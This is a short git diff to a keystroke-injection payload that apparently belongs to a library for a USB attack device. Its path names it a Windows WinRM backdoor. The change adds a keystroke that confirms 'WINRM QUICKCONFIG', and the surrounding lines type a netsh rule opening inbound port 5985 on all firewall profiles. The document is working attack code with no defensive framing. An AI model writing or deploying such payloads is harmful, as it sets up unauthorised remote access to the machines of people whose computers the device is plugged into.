diff --git a/payloads/library/remote_access/win_winrm-backdoor/payload.txt b/payloads/library/remote_access/win_winrm-backdoor/payload.txt index 27604ef..32bffcc 100644 --- a/payloads/library/remote_access/win_winrm-backdoor/payload.txt +++ b/payloads/library/remote_access/win_winrm-backdoor/payload.txt @@ -59,6 +59,10 @@ STRING WINRM QUICKCONFIG ENTER DELAY 3000 +STRING y +ENTER +DELAY 1500 + STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Windows Remote Management for OMG" PROTOCOL=TCP LOCALPORT=5985 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN ENTER DELAY 1500